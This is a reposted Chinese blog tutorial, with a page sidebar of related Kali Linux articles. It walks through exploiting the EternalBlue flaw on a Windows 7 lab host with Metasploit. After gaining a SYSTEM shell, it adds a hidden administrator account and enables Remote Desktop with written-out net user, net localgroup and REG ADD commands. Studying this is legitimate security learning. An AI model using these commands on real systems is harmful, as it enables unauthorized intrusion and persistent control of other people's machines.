kali系统——网络安全v6笔记总结(四)

最新推荐文章于 2021-12-14 20:15:04 发布
最新推荐文章于 2021-12-14 20:15:04 发布
阅读量166 收藏
点赞数
原文链接:http://blog.51cto.com/14216854/2381436
版权

利用永恒之蓝漏洞实现w7远程操控
首先目标要关闭防火墙
kali系统——网络安全v6笔记总结(四)
kali系统——网络安全v6笔记总结(四)
kali系统——网络安全v6笔记总结(四)
然后打开Metasploit
kali系统——网络安全v6笔记总结(四)
输入永恒之蓝漏洞编码
kali系统——网络安全v6笔记总结(四)
复制运行第二条辅助项目
kali系统——网络安全v6笔记总结(四)
设置漏洞选项
kali系统——网络安全v6笔记总结(四)
运行项目,结果为有一个可能是漏洞的w7漏洞
kali系统——网络安全v6笔记总结(四)
然后选择第三个项目,即***项目,并设置漏洞选项
kali系统——网络安全v6笔记总结(四)
kali系统——网络安全v6笔记总结(四)
输入漏洞***命令 exploit
kali系统——网络安全v6笔记总结(四)
于是我们便进入了对方的w7命令终端,身份为最高权限者system(系统)
kali系统——网络安全v6笔记总结(四)
下一步我们输入命令net user 用户名 密码 /add来创建一个用户
然后用一个 net localgroup administrators 用户名 /add 命令来将刚才的用户拉入讨论组
然后输入命令 net localgroup administrators 查看管理员

输入命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 来开启远程桌面端口3389

/v 所选项之下要添加的值名。
/t RegKey 数据类型
/d 要分配给添加的注册表 ValueName 的数据。
/f 不用提示就强行覆盖现有注册表项。
现在我们就可以利用其他漏洞进行以远程桌面控制为渠道的******了

sessions -l 列出会话
sessions -i <id>选择会话
sessions -k <id> 结束会话
<ctrl> z 把会话放在后台
<ctrl> c 结束会话

kali终端窗口
rdesktop 192.168.4.239:3389 远程连接命令

转载于:https://blog.51cto.com/14216854/2381436

weixin_33940102
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali-beef攻击浏览器-运维安全详细笔记总结
06-30
kali-beef攻击浏览器-运维安全详细笔记总结
网络攻防安全kali Linux漏洞扫描
最新发布
06-18
#### 一、网络攻防安全中的Kali Linux漏洞扫描 **Kali Linux**是一款专门设计用于数字取证、安全审计、逆向工程和渗透测试的操作系统。它内置了大量的安全软件和工具,使其成为进行网络安全研究的理想平台。 #### ...
【Linux_Kali网络渗透测试学习笔记总结(二)】目标识别
数据库爆破专家的博客
04-25 2485
网络渗透测试(二):目标识别 文章目录网络渗透测试(二):目标识别1.识别目标主机1.1 ping1.2 arping1.3 fping1.4 hping31.5 nping1.6 alive61.7 detect-new-ip61.8 passive_discovery61.9 nbtscan2. 识别操作系统2.1 p0f2.2 Nmap声明 1.识别目标主机 1.1 ping 如果目标主机...
【Linux_Kali网络渗透测试学习笔记总结(四)】漏洞映射
数据库爆破专家的博客
04-28 2764
网络渗透测试(四):漏洞映射 自动化工具不能识别逻辑错误,未发现的漏洞,未公布的软件缺陷,以及影响安全的人类因素。因此,应当同时结合自动化分析和人工分析的方法,综合评估安全漏洞,这将大幅度提升渗透测试工作的成果概率 文章目录网络渗透测试(四):漏洞映射1. 漏洞的类型2. 本地漏洞3. 远程漏洞4. 漏洞的分类5. OpenVAS6. Cisco分析工具6.1 Cisco Auditing Too...
kali系统——网络安全v6笔记总结(一)
weixin_33901843的博客
04-11 620
kali:(Kali Linux)是一个***测试,安全审计(Security Auditing)平台,继承了多款漏洞检测,安全扫描,漏洞利用等安全工具。基于Linux操作系统——Debian,前身为Back Track(回溯)BT5.官网https://www.kali.org。 以下内容摘自网络(kali是安全专家手头的重要工具,在一个实用的工具包里尽可能多的包含和审计工具。Kali 实现了这...
kali系统——网络安全v6笔记总结(六)
weixin_34166472的博客
04-22 185
被动侦察项目类型深透测试与公鸡的第一步,又被成为踩点。主动侦察:利用端口扫描得知端口漏洞,然后再利用端口漏洞对目标进行公鸡,但在扫描过程中会与目标产生交互,他们的请求和活动会被日志记录,可能会被直接定位测试者。被动侦察:被动侦察一般是指定分析公开的信息,这些信息包括目标本身的信息,在线的公共资源信息。由于信息已被公开,所以不用对目标进行特别扫描,测试者或公鸡者不会与目标交互,请求与活动就不会被日志...
kali系统——网络安全v6笔记总结(七)
weixin_33881041的博客
04-22 102
对称非对称及混合加密对称式加密:对称是加密是指加密方用一个密钥加密然后把加密内容和密钥用网络发送给解密方,然后解密方直接用收到的密钥解密这是一种最快速、最简单的加密方式,加密与解密用的是同样的密钥所以也称为单密钥加密。对称式密钥由于加密与解密使用同一个密钥所以速度快,但需要把密钥通过网络传输有被截获的风险,所以安全性不高,而且由于每一方与另一方之间都有一把不同的密钥,所以在大型网络运维中不好管理。...
kali Linux渗透技术详解笔记
07-27
kali Linux环境部署,Linux相关命令,枚举工具,简单网络管理协议,邮件传输协议。
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
基于Kali Linux的网络安全课程教学设计.pdf
09-06
基于 Kali Linux 的网络安全课程教学设计是指使用 Kali Linux 操作系统来设计和实施网络安全课程教学的方法和策略。该设计考虑到网络安全课程的特点,如破坏性强、知识内容繁杂、对实验环境配置要求高等特点,旨在...
kali系统——网络安全v6笔记总结(五)
weixin_34128534的博客
04-22 145
勒索病毒——GandCrad于2018年1月面世,在短短几个月经历三次快速迭代,现有GandCrad v1、GandCrad v2、GandCrad v3三个版本。GandCrad v3使用CVE——2017——8570漏洞进行传播,漏洞触发后会释放诱饵文档。与以往版本相比v3版没有直接指明赎金金额,而是要求用户使用Tor网络或者Jabler即时通讯软件获得。一旦感染勒索病毒数据就会被加密。在每个...
kali系统——网络安全v6笔记总结(八)
weixin_34194702的博客
04-23 140
PGPPGP是一个基于RSA公钥加密的邮件加密软件。它可以用来对邮件保护以避免非法权限者阅读。还可以对邮件加上数字签名从而使收信人确信邮件是你发来的,他让你可以安全的和网络上的人通信,而事先不需以任何保密渠道来传输密钥。它采用一种RSA和传统加密的杂合算法,用于数字签名的邮件文摘算法,加密前压缩,还有良好的人机工程设计。他功能强大速度不慢,而且是免费开源的。哈希算法哈希算法又叫做是单项函数算法一般...
小白kali使用出现的问题 (解决中
sinat_40801052的博客
12-19 845
1.想要安装sl小火车,无法apt-get install yum 报错: E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it? 原因:进程占用 解决杀死进程  rm /var/lib/dpkg/lock sudo dpkg --configure -a...
安装kali linux后遇到的问题解决方案
热门推荐
02-02 3万+
安装kali linux后遇到的问题解决方案 1、安装时光盘挂载不成功,出现无法挂载识别光盘镜像的问题 2、安装后终端terminal打不开 3、更新源设置 4、xx-net设置出错 5、terminal字体重叠 6、完全卸载kali linux
Kali Linux 2020.1b】 全网 最新 安装 教程 ——你会踩到的坑,遇到的问题,难以哭诉的崩溃
algae
04-20 4122
有很人多说:本人擅长Ai、Fw、Fl、Br、Ae、Pr、Id、Ps等软件的安装与卸载,精通CSS、JavaScript、PHP、ASP、C、C++、C#、Java、Ruby、Perl、Lisp、python、Objective-C、ActionScript、Pascal、spss、sas等单词的拼写,熟悉Windows、Linux、Mac、Android、IOS、WP8等系统的开关机。但是没...
Kali+Linux渗透测试的艺术》学习总结之----Kali Linux简介
xianjie0318的博客
05-25 2069
Kali Linux 是专门用于渗透测试的linux操作系统,它由BackTrack发展而来,在整合了IWHAX、WHOPPIX和Auditor这三种渗透测试专用Live linux之后,BackTrack正式改名为Kali Linux。特点:基于Debian的linux发行版、集成300多个渗透测试程序、支持绝大多数的无线网卡、修改了内核以支持数据包注入、支持基于ARM的硬件系统等等。
Kali常见问题及解决方案(持续更新的文章)
`or 1 or 不正经の泡泡
03-26 3087
直入主题两个方案 出现这个问题的话你可以理解为是软件卸载残留导致的软件无法安装问题. 在 /var/lib/dpkg/info 这目录下存放着很多软件的安装信息.基本上就是这个信息出现了问题导致了软件的安装问题.或者卸载问题. 方案一 根据提示去比如 错误提示: 已经安装 A 子进程post-installation什么什么的错误 那么直接按照提示删掉 A相关的文件 rm -rf A.* 方案二 这个很暴力 直接删除那个文件 rm -rf /var/lib/dpkg/info 然后再创建一个新的 mkd
网络安全与网站安全及计算机安全:如何使用Kali Linux获取Windows计算机操作系统管理员权限【维持】
Kali与编程
12-14 5816
一、背景介绍 Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习! 二、资源装备 1.成功拿下的 Win7虚拟机一台 2.整装待发的小白一个。 3.安装好的Kali Linux虚拟机一台。 三、安全演练 3.
2023版Kali Linux高级渗透测试指南:保障网络安全
"精通Kali Linux 高级渗透测试2023版本(Mastering Kali Linux for Advanced Penetration Testing Fourth Edition)是一本由Vijay Kumar Velu编写的权威指南,它在当前数字化时代背景下,聚焦于网络安全领域。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值